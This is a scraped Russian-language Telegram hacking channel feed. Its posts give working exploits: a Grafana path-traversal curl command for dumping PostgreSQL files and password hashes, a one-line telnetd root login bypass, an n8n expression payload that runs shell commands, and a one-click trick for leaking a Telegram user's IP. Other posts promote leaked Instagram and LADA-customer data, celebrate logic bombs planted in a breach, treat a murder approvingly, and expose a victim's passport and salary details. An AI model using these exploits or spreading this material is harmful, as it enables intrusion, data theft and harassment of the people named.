Cybred
10K subscribers
386 photos
33 videos
94 files
606 links
Download Telegram
Malwarebytes сообщает, что слили Instagram

Украли инфу о 17.5 млн. учетках (!), включая:
— имена пользователей
— юзернеймы
— емейлы
— номера телефонов
— примерное местоположение

Не смотря на то, что данные получены с помощью парсинга в 2024 году, пользователи в комментах уже сообщают о том, что у них начали угонять аккаунты.

Ссылку на скачивание автор оставил тут.
This media is not supported in your browser
VIEW IN TELEGRAM
Нашли простой способ, как можно слить IP-адрес у ничего не подозревающего собеседника в Telegram, в один клик.

Пошагово:
1. Поднимаем mitmproxy или другой listener
2. Пишем любой текст и указываем ссылку t.iss.one/proxy?server=<LISTENER_IP>&port=<LISTENER_PORT>&secret=random
3. Ждем, пока по ней кликнут, и сразу же получаем IP

Работает на iOS и Android, благодаря "автопингу" прокси. Плюс метода в том, что подвержены как старые, так и новые клиенты, а главное — никакого предупреждения о раскрытии IP при клике по замаскированной ссылке.
Secrets Patterns Database

Пользователь с ником mazen160 собрал самую большую базу данных для поиска секретов. Она насчитывает более 1600 регулярок и позволяет находить API-ключи, токены, и пароли, которые часто остаются незамеченными.

Для сравнения, у одного из самых популярных сканеров секретов GitLeaks всего 60 правил. В комплекте идет скрипт, которые позволяет конвертировать правила для него и других тулов.
1
Взлом LADA

Группа 4BID слила компанию "Брайт Парк" — сеть официальных автосалонов LADA, которая работает в 6 российских городах, включая Москву.

Под удар попали
— 22 сервера Proxmox;
— 22 NAS-хранилища с общим объёмом ~100 ТБ данных (всё вкусное — выгружено);
— Все UNIX-системы (заминированы логическими бомбами — саперам привет);
— Домен Active Directory на ~800 машин;


В результате теперь всем доступны данные более 1млн. покупателей, среди которых:
— ФИО
— номер телефона
— электронная почта
— хэши паролей
— адрес проживания
— данные о работе (стаж, доход)
— паспортные данные
— контакты

Из забавного — один из админов в процессе инцидента просто ушел спать, в то время, как у другого нашли огромную коллекцию "жесткой клубники"
Там огромная коллекция «клубники»: русскоязычное домашнее и любительское, жёсткие сцены, рипы с LegalPorno/EvilAngel/Tushy, плюс в других папках старая зоо-коллекция. Файлы с 2006 по 2024, всё в куче, активно раздаётся через uTorrent.
Дампим PostgreSQL с помощью Path Traversal

Наткнулся на гайд то, как восстановить "убитую" базу данных PostgreSQL. Его суть сводится к тому, что все данные лежат на файловой системе, и все можно довольно легко раскрутить от главного файла global/1262 (pg_database).

Его идентификатор (oid) всегда статический, и это удобно — можно легко достать с помощью Path Traversal. Вот так, на примере CVE-2021-43798 в Grafana:
curl --path-as-is -O https://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../var/lib/postgresql/data/global/1262 


А затем, с помощью него и двух бинарей с отношениями и типами данных, base/<db_oid>/1259 и base/<db_oid>/1249 (у каждой базы свой db_oid, его можно достать из pg_database), легко восстановить и содержимое всей базы данных.

С помощью pg_filedump
./pg_filedump -D int,bool,text,timestamp /path/to/db/base/16384/16393


или специальной утилиты pgread, которая автоматизирует рутину

./pgread -passwords all
PostgreSQL Password Hashes:
===========================
pg_database_owner:(no password)
admin:SCRAM-SHA-256$4096:salt$hash:proof [SUPERUSER] [LOGIN]


Что самое главное — не понадобились никакие креды, чтобы сдампить базу.
Еще даже не успели присвоить CVE

В telnetd начиная с версии 1.9.3 (май 2015 года) и вплоть до 2.7 (включительно) существует уязвимость, которая позволяет любому подключиться от имени root, без проверки пароля.

Под ударом практически все дистрибутивы Linux, которые ставят inetutils-telnetd из репозиториев:
— Debian / Ubuntu / Kali / Trisquel и производные
— Многие embedded-системы, старые роутеры, IoT-устройства, промышленные контроллеры, где до сих пор жив telnet

Shodan сейчас находит 732,350 устройств по всему миру.
А чтобы эксплуатировать, достаточно одной команды:
$ USER="-f root" telnet -a IP PORT


UPD.: присвоили https://nvd.nist.gov/vuln/detail/CVE-2026-24061
Это Кира, только без тетради

Прямо в проходной здания Роскомнадзора в Москве убит высокопоставленный сотрудник ведомства Алексей Беляев — он отвечал за блокировки сайтов и замедление трафика.

Убийство произошло 19 января: 16-летний школьник Артём ударил чиновника ножом в грудь, когда тот выходил из офиса.

Беляев работал в Роскомнадзоре больше 10 лет, на момент смерти — замначальника отдела контроля и надзора в сфере связи. Этот отдел отвечает за:
— установку и контроль «чёрных ящиков» (ТСПУ), через которые РКН напрямую блокирует YouTube, Discord, VPN и т.д.;
— мониторинг фильтрации трафика и штрафы провайдерам, если запрещённые сайты всё же открываются;
— поиск и блокировку зеркал заблокированных ресурсов;
— замедление трафика для ещё не полностью заблокированных сайтов;

Серия и номер паспорта стали недействительны 19 января 2026 года (в день смерти), а зарплата сотрудника, согласно утечкам, составляла 135 тысяч рублей в месяц.
Как не потерять все

Есть железная схема с тремя копиями:
1. Рабочая (которую используешь каждый день)
2. Локальная (чтобы быстро восстановиться)
3. Удалённая (если сгорела хата)

Хранишь все свои данные на ПК, синкаешь самое важное с NAS или просто внешним диском, и отдельно выгружаешь в облако.

Но какое облако выбрать? В таблице собраны все облачные хранилища, у которых есть lifetime-подписка — один раз платишь и получаешь доступ на всю жизнь.

У каждого есть свои нюансы, — один говорит о "пожизненном доступе" компании, а не тебя, другой удалит все твои файлы через 3 года, если туда не заходить. Здесь все описано, как и самые надежные сервисы, которые выделены зеленым.

Советую сохранить пост, чтобы не потерять. Окупается такое облако примерно за 5 лет, а перед выгрузкой нужно не забыть все зашифровать, например, с помощью Cryptomator.
3
🔥 [10/10] CVE-2026-25049: RCE в n8n

Это обход для всех предыдущих патчей. Уязвимость позволяет выполнять произвольные команды на сервере.

Уязвимы версии:
<1.123.17 (исправлено в 1.123.17)
<2.5.2 (исправлено в 2.5.2)

PoC
1. Создаем workflow
2. Добавляем Edit Field
3. Указываем в String (Expression)
{{(() => {
const { [`constr${'uct'}or`]: Fn } = Object;
const payload = "return process.mainModule.require('child_process').execSync('cat /etc/passwd').toString();";
return Fn(payload)();
})()}}

4. Нажимаем Execute Step
1
Надо было пользоваться гарантом

Сын Павла Дурова, Миша, решил по-своему отметить день безопасного интернета — заскамил трёх человек в телеге, среди которых был и админ одного из каналов.

Все началось с того, что 16-летний Миша написал первым и предложил купить у него подарок "Кепку Дурова", мол, она ему больше не нужна.

В качестве пруфов показал фотку с Хабибом, прислал кружок, где сидит рядом с основателем Telegram, и отправил пару голосовых, в которых уверял, что он не скамер:

Брат, да если моему пахану придёт репорт, что я скамлю людей в телеге, мне просто пизда будет. Я не могу так, брат. Не то что, блять, не знаю, ремнём попиздит, а просто в Дагестан на всю жизнь — я этого боюсь сильно.


В итоге парень доверился и отправил $700 за кепку, после чего продавец сразу же кинул его в бан.

Когда история разлетелась, на аккаунт Миши начали массово жаловаться, и повесили метку «скам». Дошло все до того, что Павел Дуров вмешался сам и компенсировал ущерб, лично отправил пострадавшему такую же кепку.
https://github.com/bytewreck/DumpGuard

На последних версиях Windows, mimikatz становится бесполезным, когда ты пытаешься сдампить LSASS. Это происходит, так как в LSASS ничего ценного больше не остается, ведь все секреты хранятся в отдельном защищённом процессе lsaiso.exe — этот механизм защиты называется Credential Guard, и он включен по умолчанию, начиная с с 22H2 / Server 2025.

Эта утилита позволяет "обойти" его с помощью Remote Credential Guard, который обычно используется при RDP-сессиях, чтобы не передавать секреты на удалённый сервер, — и получить все NTLMv1 хэши, не смотря на включенную защиту.
Red Team Infrastructure The Full Picture

Это самый полный гайд в 2026 году по созданию современной, устойчивой и максимально скрытой инфраструктуры для Red Team, — начиная от покупки домена, заканчивая получением отстуков.

Сегодня недостаточно просто купить VDS и поднять там C2 из коробки, — такие серверы быстро найти, а получить бан можно уже через 30 секунд после запуска.

Для того, чтобы этого не случилось, надо поднять инфру, которая замаскирует тебя и твой сервер. Чем автор и поделился — в статье он рассказывает о том, как сделать это максимально эффективно, а именно:
— подготовить прогретый домен
— настроить CDN Relay через Microsoft / AWS / Google
— поднять Redirector с многослойной фильтрацией
— сконфигурировать Malleable-профиль и изолировать Team Server

Бонусом он добавил про поднятие инфраструктуры для фишинга с нуля. Отдельно еще советую отдельную статью о том, как это можно все автоматизировать с помощью Terraform.
Выложили доклады с конференции DEF CON 33. Она прошла в Лас-Вегасе и оказалась одной из самых крупных DEF CON за всю историю — конференцию посетили около 26 000 человек, а на YouTube уже опубликовано более 350(!) видео.

Среди них много докладов на самые разные темы — от классического веба и hardware-хакинга (и куда же без AI) до совсем неожиданных направлений: гайда по отмыванию средств с помощью криптовалюты, современного подхода к кардингу и взлома физических замков в отелях.

Один из участников, даже не смотря на угрозы судом, рассказал, как ему удалось разреверсить современные морские двигатели, найти способ удаленно менять их мощность, и перехватывать управление.

Собрал пару интересных тем, чтобы ты мог оценить для себя:
1. Exploiting Security Side Channels in E2E Encrypted Msngrs
2. Mapping the Shadow War From Estonia to Ukraine
3. Infecting the Boot to Own the Kernel
4. New Red Team Networking Techniques for Initial Access and Evasion
5. Breakin 'Em All – Overcoming Pokemon Go's Anti Cheat Mechanism
6. BitUnlocker: Leverage Windows Recovery to Extract BitLocker Secrets
7. Turning Microsoft's Login Page into our Phishing Infrastructure
8. Tactical Flipper Zero You Have 1 Hour and No Other Equipment
9. How malicious packages on npm bypass existing security tools
10. TSPU: Russia's Firewall and Defending Against Digital Repression

Полный плейлист со всеми докладами тут.